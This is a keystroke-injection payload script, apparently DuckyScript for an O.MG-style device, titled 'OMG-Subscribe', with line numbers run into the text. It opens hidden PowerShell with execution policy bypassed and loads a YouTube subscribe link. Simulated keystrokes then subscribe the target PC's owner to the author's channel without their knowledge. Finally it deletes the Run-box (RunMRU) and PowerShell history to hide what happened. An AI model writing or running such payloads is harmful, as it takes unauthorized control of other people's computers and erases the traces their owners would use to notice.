Path: blob/master/payloads/library/general/-RD-Subscribe/Subscribe.txt
2968 views
REM Title: OMG-Subscribe1REM Description: This payload is meant to get the owner of the target PC to subscribe to your youtube channel2REM Author: I am Jakoby3REM Target: Windows 10, 1145GUI r6DELAY 5007STRING powershell -w h -NoP -NonI -Exec Bypass Start-Process "89REM put your youtube link here, you should test it out with mine first though ;D10STRING https://www.youtube.com/iamjakoby1112STRING ?sub_confirmation=1"13DELAY 50014ENTER15DELAY 300016TAB17DELAY 100018TAB19DELAY 100020ENTER21DELAY 50022ALT F423DELAY 100024GUI r25DELAY 5002627REM This will clear their powershell and runbox history2829STRING powershell -w h -NoP -NonI -Exec Bypass reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f; Remove-Item (Get-PSreadlineOption).HistorySavePath30DELAY 50031ENTER323334